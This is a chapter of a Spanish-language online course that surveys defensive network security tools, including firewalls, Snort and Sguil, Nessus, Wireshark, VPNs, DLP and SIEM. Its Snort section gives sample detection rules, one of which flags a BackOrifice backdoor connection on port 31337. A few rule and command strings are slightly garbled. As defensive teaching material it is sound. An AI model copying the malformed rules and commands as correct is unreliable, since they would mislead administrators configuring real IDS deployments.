Bienvenidos a este capítulo de este Curso de redes para hackers – Herramientas de Seguridad. Comparte este articulo y síguenos para recibir más capítulos, guías y cursos gratis.
Esta guía es parte de un curso mucho más grande en donde te enseñamos a convertirte en hacker de 0 a 100. Desde los conocimientos más básicos hasta conseguir empleo.
En esta guía veremos desde cero un tema tan amplio como son las redes informáticas y lo haremos desde el punto de vista del hacking y la ciberseguridad.
Para saber más comente a continuación, respondemos todos y cada uno de los comentarios.
¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?
Herramientas de Seguridad de Red: Guía Completa para Hackers y Administradores
La seguridad de red es un campo crítico en la protección de la infraestructura digital, y una gran variedad de herramientas están disponibles para ayudar a los profesionales a identificar, mitigar, y prevenir amenazas. Estas herramientas son esenciales tanto para administradores de red que buscan proteger sus sistemas como para hackers éticos que buscan identificar vulnerabilidades antes de que puedan ser explotadas por actores maliciosos.
1. Firewalls
Un firewall es una herramienta fundamental en la seguridad de red que actúa como una barrera entre una red confiable y otra no confiable, como Internet. Controla el tráfico entrante y saliente basado en un conjunto de reglas de seguridad predefinidas. Los firewalls pueden ser basados en hardware, software, o una combinación de ambos.
Un firewall (cortafuegos) es un muro o partición diseñada para evitar que el fuego se propague de una parte a otra de un edificio. En las redes de computadoras, un firewall está diseñado para controlar o filtrar la entrada o salida de comunicaciones de un dispositivo o una red, como se muestra en la figura.
Un firewall puede instalarse en una única computadora con el propósito de proteger dicha computadora (firewall ejecutado en un host) o puede ser un dispositivo de red independiente que protege toda una red de computadoras y todos los dispositivos host en dicha red (firewall basado en la red). Durante años, dado que los ataques a la computadora y la red se han vuelto más sofisticados, se han desarrollado nuevos tipos de firewalls que atienden diferentes fines en la protección de la red.
Tipos de Firewalls
- Firewall de Filtrado de Paquetes: Examina cada paquete que entra o sale de la red y lo acepta o rechaza según las reglas de filtrado.
- Firewall de Inspección de Estado: Monitorea el estado de las conexiones activas y toma decisiones de filtrado basadas en el contexto de la sesión.
- Firewall de Próximo Generación (NGFW): Combina inspección profunda de paquetes (DPI), prevención de intrusiones, y otras funciones avanzadas con la funcionalidad de un firewall tradicional.
- Firewall de capa de red: filtrado basado en las direcciones IP de origen y destino.
- Firewall de capa de transporte: filtrado basado en puertos de origen y datos de destino y filtrado basado en los estados de conexión.
- Firewall de capa de aplicación: filtrado basado en la aplicación, el programa o el servicio.
- Firewall de aplicación consciente del contexto: filtrado basada en el usuario, el dispositivo, la función, el tipo de aplicación y el perfil de amenazas.
- Servidor proxy: filtrado de solicitudes de contenido web, como URL, dominio, medios, etcétera.
- Servidor de proxy inverso: ubicados frente a los servidores web, los servidores de proxy inversos protegen, ocultan, descargan y distribuyen el acceso a los servidores web.
- Firewall de traducción de direcciones de red (NAT): ocultan o enmascaran las direcciones privadas de los hosts de red.
- Firewall basado en host: filtrado de puertos y llamadas de servicio del sistema en el sistema operativo de una computadora.
Ejemplos Populares
- pfSense: Un firewall de código abierto basado en FreeBSD que es altamente configurable y extensible.
- Cisco ASA: Un firewall avanzado que ofrece seguridad combinada con capacidades de VPN y prevención de intrusiones.
Ventajas y Desventajas
- Ventajas:
- Proporciona una primera línea de defensa contra ataques externos.
- Puede bloquear tráfico no deseado y proteger redes internas.
- Desventajas:
- Puede ser complejo de configurar y mantener.
- No puede proteger contra amenazas internas o ataques que ya han pasado la capa de firewall.
2. Sistemas de Detección y Prevención de Intrusiones (IDS/IPS)
Los IDS e IPS son herramientas diseñadas para monitorear el tráfico de red y detectar actividades sospechosas. Mientras que un IDS solo detecta y alerta sobre posibles ataques, un IPS también puede tomar medidas para detenerlos, como bloquear el tráfico malicioso.
Los sistemas de detección de intrusiones son tan importantes como el firewall porque nos ayudan a detectar el tipo de ataque que se está realizando a nuestro sistema y luego a crear una solución para bloquearlos. La parte de monitoreo, como rastrear registros, buscar firmas dudosas y mantener un historial de los eventos desencadenados, también ayuda a los administradores de red a verificar la integridad y autenticidad de la conexión que se produce.
Sistema de prevención de intrusiones (IPS) : monitoreo ACTIVO de la actividad en busca de anomalías y alertando/notificando Y tomando medidas cuando se encuentran .
Sistema de detección de intrusiones (IDS) : monitoreo PASIVO de la actividad en busca de anomalías y alertando/notificando cuando se encuentran.
Tipos de implementación: HIDS, NIDS y WIDS:
- Basado en host : supervisa la actividad en un solo dispositivo/host al instalarse localmente.
- Basado en red : supervisa la actividad en una red mediante sensores remotos que envían información a un sistema central. A menudo se combina con un sistema de información de seguridad y SIEM para su análisis. A menudo se utilizan búsquedas de ARP inversa o DNS inversa para descubrir la fuente
Detección basada en el conocimiento y el comportamiento:
- Basado en conocimiento (basado en firmas | coincidencia de patrones) : la forma más común de detección. Utiliza una base de datos de perfiles o firmas para evaluar todo el tráfico.
- Basado en el comportamiento (estadístico | anomalía | heurístico) : comienza creando una línea base de comportamiento para el sistema o la red monitoreados y luego compara todo el tráfico con esa línea en busca de desviaciones. Se puede etiquetar como un sistema de IA o experto.
Tipos de alertas de IDS
- Verdadero Positivo –> Ataque – Alerta ✅✅
- Falso positivo –> Sin ataque – Alerta ❌✅
- Falso negativo –> Ataque – Sin alerta ✅❌
- Este es el peor escenario
- Verdadero Negativo -> Sin Ataque – Sin Alerta ❌❌
Tipos de IDS/IPS
- Basado en Firma: Detecta ataques conocidos mediante la comparación de patrones de tráfico con una base de datos de firmas.
- Basado en Anomalías: Identifica comportamientos anómalos que no se ajustan al patrón normal de tráfico de la red.
Ejemplos Populares
- Snort: Un IDS/IPS de código abierto ampliamente utilizado que puede detectar una variedad de ataques mediante firmas de reglas personalizables.
- Suricata: Similar a Snort, pero con características adicionales como inspección profunda de paquetes y soporte para múltiples hilos de procesamiento.
- Sguil: Sguil es una colección de componentes de software gratuitos para la supervisión de la seguridad de la red y el análisis de alertas de IDS basado en eventos.
SNORT (sniffer + IDS + Registro)
Una de las mejores herramientas de detección de intrusos es Snort . Puede obtener información y descargarla desde www.snort.org
Se basa en software, pero es de código abierto, por lo que es gratuito y fácil de configurar. Tiene una red basada en firmas de tiempo real (IDS), que notifica a los administradores del sistema sobre ataques como escáneres de puertos, ataques DDOS, ataques CGI, puertas traseras y huellas dactilares del sistema operativo.
Funciona como un auditor de paquetes (sniffer) y un detector de intrusiones basado en red. monitorea el segmento de red al que está conectado, proporcionando seguridad y prevención de intrusiones.
Snort es un rastreador de paquetes que monitorea el tráfico de la red en tiempo real y examina cada paquete de cerca para detectar una carga peligrosa o anomalías sospechosas.
- Incluye un sniffer , un registrador de tráfico y un analizador de protocolos.
- Funciona en tres modos diferentes
- Sniffer : observa los paquetes en tiempo real
- Registrador de paquetes : guarda los paquetes en el disco para revisarlos más tarde
- NIDS : analiza el tráfico de la red en función de varios conjuntos de reglas
- La configuración está en /etc/snortLinux y C:\snort\etcen Windows; el archivo es snort.conf .
Este programa tiene tres modos de funcionamiento:
- Sniffer.
- Registro de paquetes.
- IDS (Intrusion Detection System).
Información capturada por SNORT
La primera línea en un registro de alertas contiene tres números: el número del componente que acabará la alerta, el Signature ID (identificación de firma de ataque) y la versión de la firma. La siguiente línea puede incluir información sobre el tipo de ataque y su nivel de prioridad. Snort clasifica las alertas en 5 niveles, siendo el nivel 1 el más serio y el nivel 5 el menos significativo.
Para utilizar Snort como IDS continuo, es recomendable ejecutarlo como un servicio (daemon) y automatizar su inicio durante el arranque del sistema utilizando el parámetro –D
Snort tiene tres modos básicos de funcionamiento
Se pueden configurar mediante el parámetro –Q:
- Inline: permite usar reglas tipo drop para rechazar paquetes que generen alertas. funciona como un sistema de detección de intrusiones (IDS) y como sistema de prevención de intrusiones (IPS), al reaccionar ante ataques detectados.
- Passive: este es el modo IDS, en el que las reglas de tipo drop no son cargadas
- Inline-Test: simula el modo Inline, permite la evaluación de las reglas drop pero sin afectar al tráfico. Cuando el tráfico corresponda con una regla tipo drop esta se registrará en el log como wdrop (would drop).
El archivo snort.conf contiene la configuración para ejecutar Snort como IDS y permite adaptar su funcionamiento. Los parámetros más relevantes son las reglas aplicadas al tráfico capturado, basadas en firmas de ataque. Para evitar un archivo difícil de manejar, snort.conf permite incluir otros archivos mediante el comando “include”. se pueden crear diferentes archivos de reglas y luego incluirlos en snort.conf facilitando la organización y configuración.
Snort incluye varias reglas agrupadas por tipo de amenazas en diferentes archivos. Para activar estas reglas, basta con incluir la línea “include” correspondiente en el archivo de configuración. Las reglas en Snort definen la acción a realizar y especifican criterios como protocolo, fuente, destino, contenido del paquete y valores en las cabeceras para identificar paquetes como posibles amenazas. Lo primero que indica la regla es la acción a realizar. En la regla del ejemplo se indica la acción alert, pero esta no es la única acción disponible
Posibles acciones que se pueden definir:
- alert: Genera una alerta que se incluye en el registro de alerta seleccionado y además guarda en el registro los paquetes que han provocado la alerta.
- log: Guarda registro de los paquetes.
- pass: ignora el paquete.
- drop: bloquea el paquete y lo guarda en el registro.
- reject: además de bloquear el paquete y guardarlo en el registro envía un paquete de respuesta de tipo «reset» para comunicaciones TCP o una respuesta de tipo «port unreachable» para UDP y así cortar la comunicación.
- sdrop: bloquea el paquete pero no lo guarda en el registro
Snort incluye un conjunto extenso de reglas desarrolladas por el Vulnerability Research Team (VRT) de Sourcefire. este conjunto no es suficiente, ya que continuamente se detectan nuevas amenazas y se generan nuevas reglas. Es necesario actualizar las reglas con las publicaciones de Sourcefire y otros pudiendo ser estas actualizaciones gratuitas o mediante suscripción de pago. Pulled_Pork permiten realizar dicha actualización de forma automática. Snort forma parte de herramientas más complejas y llamativas de detección de intrusiones como Sguil, utilizándose como componente principal del módulo de detección.
Comandos básicos de SNORT:
Modos operativos:
- Sniffer —>snort -v
- Snort como registrador de paquetes —>snort -l
- NIDS —> snort -Aosnort -c <path_to_conf_file>
Ejemplo de uso :
- snort -i 4 -l c:\Snort\log -c c:\Snort\etc\snort.conf -T
- Este comando probará la configuración y las reglas de snort y verificará si hay errores sin iniciarse.
- -i 4—> especificador de interfaz, en caso de que sea la interfaz 4.
- -l—> para el registro
- -c—> utilizar el archivo de reglas de Snort especificando la ruta
- -T—> Solo para pruebas, esto evita que Snort se inicie; esencialmente para verificar si hay algún error y si las reglas son buenas.
- snort -i 4 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii
- Este comando iniciará Snort NIDS y registrará todo en ASCII.
Comandos básicos :
Bandera | Información |
-A | Establecer modo de alerta: rápido, completo, consola, prueba o ninguno |
-b | Registra paquetes en formato tcpdump (¡mucho más rápido!) |
-B <mask> | Ofuscar direcciones IP en alertas y volcados de paquetes mediante máscara CIDR |
-c <rules> | Usar archivo de reglas |
-C | Imprima cargas útiles con datos de caracteres únicamente (no hexadecimales) |
-l | Especifica el directorio de registro (todas las alertas y los registros de paquetes se colocan en este directorio) |
-i <interface number> | Especifica en qué interfaz debe escuchar Snort |
-K | Modo de registro (pcap[predeterminado], ascii, ninguno) |
-? | Enumera todos los interruptores y opciones y luego sale. |
Reglas de SNORT
SNORT tiene un motor de reglas que permite personalizar las capacidades de monitoreo y detección.
- Hay tres acciones de reglas disponibles
- Alerta
- Aprobar
- Registro
- Y tres protocolos IP disponibles:
- TCP
- UDP
- ICMP
Desglosando una regla de Snort:
alert icmp any any -> &HOME_NET any (msg:”ICMP test”; sid:1000001; rev:1; classtype:icmp-event;)
Parte de la regla | Información |
alert icmp any any -> $HOME_NET any | Encabezado de la regla ⬇️ |
alert | Acción de la regla. Snort generará una alerta cuando se cumpla la condición establecida. |
any(1º) | IP de origen. Snort buscará todas las fuentes |
any(2do) | Puerto de origen. Snort buscará en todos los puertos. |
-> | Dirección. De origen a destino; (origen -> destino) |
&HOME_NET | Dirección IP de destino. Usamos el valor HOME_NET del archivo snort.conf, que es una variable que define la red o las redes que intentas proteger. |
any(3º) | Puerto de destino. Snort buscará en todos los puertos de la red protegida. |
(msg:”ICMP test”; sid:1000001; rev:1; classtype:icmp-event;) | Opciones de reglas ⬇️ |
msg:”ICMP test” | Snort incluirá este mensaje con la alerta. |
sid:1000001 | ID de la regla de Snort. Recuerde que todos los números menores a 1 000 000 están reservados, por eso comenzamos con 1000001 (puede usar cualquier número, siempre que sea mayor que 1 000 000) |
rev:1 | Número de revisión. Esta opción permite un mantenimiento más sencillo de las reglas. |
classtype:icmp-event | Clasifica la regla como un “evento ICMP”, una de las categorías predefinidas de Snort. Esta opción ayuda con la organización de la regla. |
Ejemplos de reglas:
alert tcp 192.168.x.x any -> &HOME_NET 21 (msg:”FTP connection attempt”; sid:1000002; rev:1;)
- Alerta TCP en una dirección IP de origen 192.168.xx con cualquier puerto; destino HOME_NET en el puerto 21.
alert tcp $HOME_NET 21 -> any any (msg:”FTP failed login”; content:”Login or password incorrent”; sid:1000003; rev:1;)
- Alerta TCP en el puerto HOME_NET 21 (FTP) como origen, a cualquier dirección IP y puerto de destino.
alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : “BACKDOOR ATTEMPT-BackOrifice”)
- Esto alerta sobre el tráfico que no proviene de una red externa a la interna en el puerto 31337.
Ejemplo de salida
- 19/10-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 tipo:0x800 longitud:0x5EA
- xxx -> xxx TTL TCP:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF
- La información importante está en negrita.
Sguil
Un sistema Sguil consta de un servidor y varios sensores distribuidos en la red. cada sensor monitorea la seguridad en su segmento de red y reporta la información al servidor Sguil de manera regular
El servidor Sguil coordina y almacena la información recibida de todos los sensores en su base de datos. Los usuarios acceden a esta información mediante el cliente Sguil, que es multiplataforma. Para que los sensores Sguil sean capaces de capturar el tráfico de su segmento de red, deberán estar conectados a un Hub o Switch que haya sido configurado para enviar copia de todos los paquetes de datos.
Arquitectura de un sistema de monitorización Sguil
Cada sensor Sguil monitorea el tráfico en el segmento de red al que está conectado, pudiendo instalarse múltiples sensores en una misma máquina para monitorear segmentos diferentes. Estos sensores utilizan diversas herramientas para supervisar el tráfico y obtener información que luego envían al servidor.
- Sguil hace uso de Snort para obtener alertas de seguridad y/o intrusión.
- Sguil integra también SANCP (Security Analyst Network Connection Profiler, una herramienta que permite obtener información estadística del tráfico analizado) para obtener datos de sesiones TCP.
- Una segunda instancia de Snort se encarga de recolectar copia de todos los paquetes que pasan por el sensor (utiliza las funciones de capturador de paquetes o sniffer que proporciona Snort).
- Gracias a tcpflow es capaz de reconstruir datos de la capa de aplicación.
- Gracias a P0f es capaz de analizar las huellas del tráfico TCP/IP y detectar así el sistema operativo de los integrantes en la comunicación.
- Una instancia de MySQL guarda toda la información obtenida por Snort.
- La información obtenida se envía al servidor Sguil. La aplicación cliente permite conectarse a cualquier servidor Sguil mediante su dirección IP, puerto del servicio, y un usuario y contraseña autorizados en dicho servidor.
La información recopilada por sigil
La información adicional sobre el ataque recopilado por Sguil tiene como objetivo ayudar al analista de seguridad a determinar las acciones del atacante, entender los pasos del ataque y las herramientas utilizadas. Proporciona una gran cantidad de información para investigar los diferentes eventos de seguridad.
A partir de la información recopilada, el analista deberá analizar y evaluar cada alerta para tomar una decisión. Permite asociar diferentes categorías a las alertas y el analista puede marcar cada una de ellas dentro de un determinado nivel utilizando las teclas de función. Las categorías disponibles son:
- F1: Categoría I: Acceso root/Admin no autorizado.
- F2: Categoría II: Acceso de usuario no autorizado.
- F3: Categoría III: Intento de acceso no autorizado.
- F4: Categoría IV: Ataque de tipo de denegación de servicio efectivo.
- F5: Categoría V: Violación de la política de seguridad.
- F6: Categoría VI: Reconocimiento o escaneo de puertos abiertos.
- F7: Categoría VII: Infección por virus informático.
- F8: No es necesario realizar ninguna acción. Si el analista encargado de revisar las alertas considera que una alerta es un falso positivo, la puede descartar seleccionándola y pulsando F8.
- F9: Escalar el evento. Si el analista no está seguro sobre una alerta, puede “escalarla” pulsando F9 para que otro analista más experimentado analice la actividad del posible atacante y trate de clasificarla.
Si considera que la alerta es real, seleccionará la alerta y pulsará la tecla de función correspondiente para asociarla con la categoría adecuada.
Otros IDS son:
- BlackICE Defender
- CyberCop Monitor
- Check point RealSecure
- Cisco Secure IDS
- Vanguard Enforcer
- Lucent RealSecure.
Ventajas y Desventajas
- Ventajas:
- Puede identificar y detener una amplia gama de ataques en tiempo real.
- IDS/IPS basados en anomalías pueden detectar ataques nuevos y desconocidos.
- Desventajas:
- Puede generar falsos positivos, lo que requiere una gestión cuidadosa.
- Un IPS mal configurado podría bloquear tráfico legítimo y causar interrupciones en el servicio.
Para saber más debes leer…
3. Escáneres de Vulnerabilidades
Los escáneres de vulnerabilidades son herramientas que analizan sistemas, aplicaciones y redes en busca de debilidades que puedan ser explotadas por atacantes. Estas herramientas son cruciales para identificar y corregir vulnerabilidades antes de que sean explotadas.
Tipos de Escáneres
- Escáneres de Red: Analizan redes enteras en busca de dispositivos y servicios vulnerables.
- Escáneres de Aplicaciones Web: Se enfocan en identificar vulnerabilidades en aplicaciones web, como inyecciones SQL o cross-site scripting.
- Escáneres de Seguridad de Base de Datos: Evalúan bases de datos en busca de configuraciones inseguras, usuarios con privilegios excesivos, y vulnerabilidades en el software de base de datos.
Ejemplos Populares
- Nessus: Un escáner de vulnerabilidades ampliamente utilizado que puede identificar más de 50,000 vulnerabilidades en sistemas operativos, bases de datos, aplicaciones web y más.
- OpenVAS: Una alternativa de código abierto a Nessus, con capacidades similares para detectar vulnerabilidades.
NESSUS
es una herramienta comercial de análisis de vulnerabilidades desarrollada por Tenable Network Security, que ayuda a detectar posibles vulnerabilidades en máquinas escaneadas. utiliza la tecnología “Nessus Professional-Feed“. Tenable crea un plugin para Nessus para nuevas vulneravilidades permitiendo que Nessus realice chequeos de red y host siempre actualizados.
Los suscriptores de Nessus pueden utilizar el contenido desarrollado por Tenable para realizar auditorías y cubren más de 50,000 vulnerabilidades Estas auditorías se realizan según políticas personalizadas, configuraciones de sistemas activos y políticas basadas en organismos especializados como NIST, CERT, SANS o vendedores como Microsoft y Red Hat.
Las características de Nessus:
- Análisis en profundidad.
- Auditoría de dispositivos móviles.
- Auditoría antivirus, de botnets y procesos maliciosos.
- Integración de gestión de parches de seguridad.
Nessus funciona con una estructura cliente-servidor. se debe instalar el programa servidor descargable desde el sitio web de Tenable. Nessus se iniciará como un servicio y estará listo para ser accedido a través del cliente web. Para conectar con el mismo hay que acceder a la siguiente URL: https://ip_servidor_nessus:8834.
La primera vez que se accede al servidor Nessus desde el cliente web, es necesario realizar la configuración inicial de la aplicación. Esto incluye la creación de una cuenta de administrador y el registro de un proveedor de plugins. Los plugins permiten al servidor Nessus llevar a cabo los escaneos de vulnerabilidades.
Aunque Nessus es una herramienta comercial, ofrece una opción gratuita llamada “Home Feed” para usuarios individuales. En la pantalla inicial del cliente Nessus, se pueden ver resultados de escaneos anteriores o definir nuevos. Para lanzar un nuevo escaneo, se debe seleccionar “Add” y definir el objetivo (dirección IP, dominio o rango de direcciones IP).
Se debe indicar el tipo de análisis a realizar (escaneo interno o externo), según si la máquina objetivo se encuentra en la misma red o a través de Internet. se pueden agregar políticas de escaneo personalizadas en la sección “Policies”.
Politicas en Nessus
Para cada nueva política, se deben definir características relevantes:
- Nombre de la política.
- Puertos a escanear.
- Tipo de escaneo de puertos a realizar.
- Número de conexiones paralelas.
- Credenciales para un escaneo más en profundidad de determinados servicios.
- Definición de las plugins que se van a utilizar en el análisis de vulnerabilidades que se está definiendo.
- En la última pantalla de configuración se podrán definir una serie de preferencias que van a permitir ajustar tanto la forma de realizar el análisis como el detalle del mismo.
El escaneo en curso aparecerá en la lista de escaneos y mostrará su estado. Una vez finalizado, se moverá a la lista de “reports”, donde se mostrarán los resultados de todos los escaneos realizados hasta el momento. Para examinar los resultados de un escaneo, seleccione el reporte deseado y presione “Browse”.
La primera pantalla mostrará un resumen de las vulnerabilidades encontradas, agrupadas por su nivel de riesgo. Al hacer clic en una entrada, se accede a los detalles, donde las vulnerabilidades encontradas se agrupan por nivel de riesgo y también por el puerto en el que se detectaron.
Y pulsando en un determinado puerto se ve una lista detallada de las plugins que han detectado vulnerabilidades en dicho puerto. pulsando sobre cada una de las vulnerabilidades se mostrará información detallada sobre la misma. Se da una explicación detallada sobre la vulnerabilidad encontrada e incluso se proporciona información sobre cómo corregirla.
Para saber más debes leer…
Ventajas y Desventajas
- Ventajas:
- Proporciona una evaluación detallada de las debilidades en la infraestructura de TI.
- Puede automatizar el proceso de escaneo y generación de informes.
- Desventajas:
- Los escaneos pueden ser lentos y consumir recursos significativos.
- Pueden generar falsos positivos, lo que requiere una revisión manual.
4. Analizadores de Paquetes
Los analizadores de paquetes, también conocidos como sniffers de red, capturan y analizan el tráfico de red en tiempo real. Estas herramientas son esenciales para la resolución de problemas de red, la detección de intrusiones y la investigación de incidentes de seguridad.
Ejemplos Populares
- Wireshark: El analizador de paquetes más popular y ampliamente utilizado, Wireshark permite la inspección profunda de cientos de protocolos y la captura de tráfico en tiempo real.
- Tcpdump: Una herramienta de línea de comandos que captura y analiza paquetes en redes Unix y Linux.
Para saber más debes leer…
Ventajas y Desventajas
- Ventajas:
- Permite un análisis detallado del tráfico de red, ayudando a identificar problemas y ataques.
- Puede usarse para monitorear tráfico en tiempo real y diagnosticar problemas de conectividad.
- Desventajas:
- Requiere un alto nivel de experiencia para interpretar correctamente los datos capturados.
- Puede generar grandes cantidades de datos, lo que dificulta la búsqueda de información relevante.
5. Proxies
Un proxy actúa como intermediario entre el usuario y el servidor, interceptando y controlando las solicitudes. Los proxies pueden ser utilizados tanto para propósitos de seguridad, como para la privacidad o la optimización del tráfico de red.
Tipos de Proxies
- Proxy HTTP: Utilizado para filtrar, registrar o manipular el tráfico HTTP.
- Proxy Transparente: Intercepta el tráfico sin que el usuario sea consciente de su presencia.
- Proxy Inverso: Colocado frente a servidores web, este tipo de proxy distribuye el tráfico de entrada entre varios servidores para balancear la carga o añadir seguridad.
Ejemplos Populares
- Squid: Un proxy de caché y servidor de proxy HTTP que mejora el rendimiento y añade una capa de seguridad.
- Burp Suite: Un proxy usado en pruebas de seguridad de aplicaciones web, con herramientas para identificar vulnerabilidades.
Ventajas y Desventajas
- Ventajas:
- Añade una capa de seguridad y control al tráfico de red.
- Puede mejorar el rendimiento de la red mediante el almacenamiento en caché de contenido.
- Desventajas:
- Puede introducir latencia adicional en las comunicaciones.
- Un mal uso o configuración incorrecta puede comprometer la seguridad.
6. Sistemas de Autenticación
Los sistemas de autenticación verifican la identidad de los usuarios antes de permitir el acceso a los recursos de la red. La autenticación es una medida esencial para proteger datos y servicios sensibles.
Tipos de Autenticación
- Autenticación Basada en Contraseñas: El método más común, donde los usuarios ingresan una contraseña para acceder a los recursos.
- Autenticación Multifactor (MFA): Requiere que los usuarios proporcionen dos o más formas de verificación para acceder a un sistema.
- Autenticación Biométrica: Utiliza características físicas únicas del usuario, como huellas dactilares o reconocimiento facial.
Ejemplos Populares
- Kerberos: Un protocolo de autenticación de red que utiliza criptografía de clave simétrica para proporcionar autenticación en redes no seguras.
- LDAP (Lightweight Directory Access Protocol): Protocolo utilizado para acceder a y mantener información de directorio distribuida sobre una red IP.
Ventajas y Desventajas
- Ventajas:
- Mejora la seguridad al asegurarse de que solo usuarios autorizados puedan acceder a los recursos.
- MFA reduce significativamente el riesgo de acceso no autorizado.
- Desventajas:
- La gestión de contraseñas y la configuración de MFA pueden ser complejas y consumir tiempo.
- Los sistemas biométricos pueden ser costosos y tienen implicaciones de privacidad.
7. VPN (Virtual Private Network)
Una VPN (Virtual Private Network) permite a los usuarios crear una conexión segura a una red remota a través de una red pública como Internet. Esta tecnología cifra el tráfico de datos entre el dispositivo del usuario y la red destino, protegiendo la información de posibles interceptaciones. Las VPNs son ampliamente utilizadas para acceder de manera segura a recursos de red desde ubicaciones remotas y para ocultar la dirección IP del usuario, lo que proporciona anonimato en línea.
Para las computadoras portátiles u otros dispositivos con NIC por cable, una conexión por cable podría mitigar esta vulnerabilidad. Además, también puede utilizarse un servicio de VPN de confianza para prevenir el acceso no autorizado a los datos mientras se utiliza la red inalámbrica. Cuando está lejos de casa, los puntos públicos de acceso inalámbrico permiten tener acceso a su información en línea y navegar por Internet. Sin embargo, es mejor no acceder ni enviar información personal confidencial a través de una red pública inalámbrica.
Verifique si su computadora está configurada para compartir archivos y medios digitales y si requiere la autenticación de usuario con encriptación. Para evitar que una persona intercepte su información (lo que se conoce como “eavesdropping”) mientras utiliza una red pública inalámbrica, utilice túneles VPN y servicios encriptados. El servicio VPN proporciona acceso seguro a Internet con una conexión cifrada entre la computadora y el servidor VPN del proveedor de servicios VPN. Con un túnel VPN encriptado, aunque se intercepte una transmisión de datos, no podrá descifrarse.
Además…
Muchos dispositivos móviles, como smartphones y tablets, incluyen el protocolo inalámbrico Bluetooth. Esta funcionalidad permite que los dispositivos con Bluetooth habilitados se conecten entre sí y compartan información. Desafortunadamente, Bluetooth puede ser atacado por hackers a fin de espiar algunos dispositivos, establecer controles de acceso remoto, distribuir malware y consumir baterías. Para evitar estos problemas, mantenga Bluetooth desactivado cuando no lo utiliza.
Este tipo de red se utiliza mucho en redes de pequeñas empresas o grandes empresas. Ayuda a enviar y recibir datos a través de Internet, pero de forma segura y cifrada. Por lo general, esta red se crea entre dos dispositivos de red seguros, como dos cortafuegos.
Tipos de VPN
- VPN de Acceso Remoto: Permite a los usuarios conectarse de manera segura a una red corporativa desde cualquier lugar, como si estuvieran físicamente presentes en la red interna. Este tipo de VPN es ideal para empleados que trabajan de forma remota.
- VPN de Sitio a Sitio: Utilizada para conectar redes completas entre sí a través de Internet, como la conexión de las oficinas centrales de una empresa con sus sucursales. Esta configuración permite que las redes operen como una única entidad, a pesar de la distancia geográfica.
- VPN SSL (Secure Sockets Layer): Una tecnología específica que facilita la creación de conexiones VPN seguras mediante navegadores web estándar. No requiere la instalación de software adicional en el dispositivo del usuario, lo que la hace muy accesible y fácil de usar.
Ejemplos Populares
- OpenVPN: Una solución de VPN de código abierto que es altamente configurable y ofrece una fuerte seguridad mediante el uso de SSL/TLS.
- Cisco AnyConnect: Una VPN ampliamente utilizada en entornos corporativos que ofrece acceso seguro a la red con capacidades adicionales como autenticación multifactor.
Ventajas y Desventajas
- Ventajas:
- Cifrado Seguro: Proporciona un alto nivel de cifrado, protegiendo los datos contra interceptaciones.
- Acceso Remoto Seguro: Facilita el acceso seguro a recursos de red desde cualquier lugar del mundo.
- Anonimato: Oculta la dirección IP del usuario, proporcionando una mayor privacidad en línea.
- Desventajas:
- Latencia: Puede introducir retrasos debido al cifrado y la transmisión de datos a través de servidores VPN.
- Configuración Compleja: La implementación y configuración pueden ser complicadas, especialmente en entornos corporativos grandes.
- Costos: Los servicios de VPN de alta calidad suelen requerir suscripciones pagadas, lo que puede incrementar los costos para las empresas.
8. Sistemas de Prevención y Detección de Fugas de Datos (DLP)
Los sistemas DLP (Data Loss Prevention) están diseñados para proteger la información sensible de ser transferida fuera de la red corporativa, ya sea por accidente o de forma malintencionada. Estas herramientas monitorean y controlan el flujo de datos en tiempo real, asegurando que la información confidencial, como datos financieros o propiedad intelectual, no sea compartida sin autorización.
Tipos de DLP
- DLP Basado en Red: Monitorea y protege los datos mientras se mueven a través de la red, asegurando que la información sensible no sea transmitida fuera del entorno seguro.
- DLP Basado en Endpoint: Protege los datos en los dispositivos de los usuarios, como equiposs portátiles o teléfonos móviles, y previene que información sensible sea copiada o transferida a dispositivos externos o aplicaciones no autorizadas.
- DLP Basado en la Nube: Protege los datos en entornos de nube, asegurando que la información almacenada o transmitida en servicios de nube cumpla con las políticas de seguridad corporativas.
Ejemplos Populares
- Symantec Data Loss Prevention: Una solución DLP integral que cubre la protección de datos en endpoints, en la red, y en la nube.
- Forcepoint DLP: Un sistema que proporciona visibilidad y control sobre el uso de datos confidenciales en tiempo real, con capacidades avanzadas de análisis de comportamiento.
Ventajas y Desventajas
- Ventajas:
- Protección Integral: Asegura que la información crítica no salga de la organización sin autorización.
- Cumplimiento Normativo: Ayuda a las empresas a cumplir con normativas de protección de datos, como GDPR.
- Visibilidad Completa: Ofrece visibilidad sobre el uso y la transferencia de datos dentro de la organización.
- Desventajas:
- Impacto en el Rendimiento: Puede afectar el rendimiento de la red o de los dispositivos debido a la sobrecarga de monitoreo.
- Falsos Positivos: La configuración inadecuada puede resultar en bloqueos innecesarios, lo que puede interrumpir el flujo de trabajo.
- Costos de Implementación: Las soluciones DLP pueden ser costosas, tanto en términos de software como de personal necesario para administrarlas.
9. Sistemas de Gestión de Información y Eventos de Seguridad (SIEM)
Los sistemas SIEM (Security Information and Event Management) son herramientas que recopilan, correlacionan y analizan los datos de eventos de seguridad de toda la infraestructura de TI. Los SIEMs proporcionan una visión centralizada de las amenazas potenciales, permitiendo a los equipos de seguridad identificar y responder a incidentes en tiempo real.
Funcionalidades Clave
- Recopilación de Datos: Centraliza la recopilación de registros (logs) y eventos de seguridad de diferentes sistemas y dispositivos en una única plataforma.
- Correlación de Eventos: Analiza y correlaciona los datos para identificar patrones de comportamiento que puedan indicar un ataque o una amenaza interna.
- Alertas en Tiempo Real: Genera alertas basadas en políticas predefinidas cuando se detectan comportamientos sospechosos o eventos que puedan representar un riesgo de seguridad.
Ejemplos Populares
- Splunk: Una plataforma de análisis de datos que también ofrece capacidades de SIEM, conocida por su robusta capacidad de búsqueda y análisis en tiempo real.
- IBM QRadar: Un SIEM que proporciona detección de amenazas, análisis de incidentes, y respuesta automatizada en un entorno empresarial.
Ventajas y Desventajas
- Ventajas:
- Visión Integral: Ofrece una visión completa de la seguridad de la red al centralizar y correlacionar eventos de múltiples fuentes.
- Detección Proactiva: Permite la detección temprana de amenazas y ayuda a los equipos de seguridad a responder de manera proactiva.
- Cumplimiento Normativo: Ayuda a las organizaciones a cumplir con normativas y requisitos de auditoría al proporcionar informes detallados de seguridad.
- Desventajas:
- Complejidad: La configuración y gestión de un SIEM pueden ser complicadas y requerir conocimientos especializados.
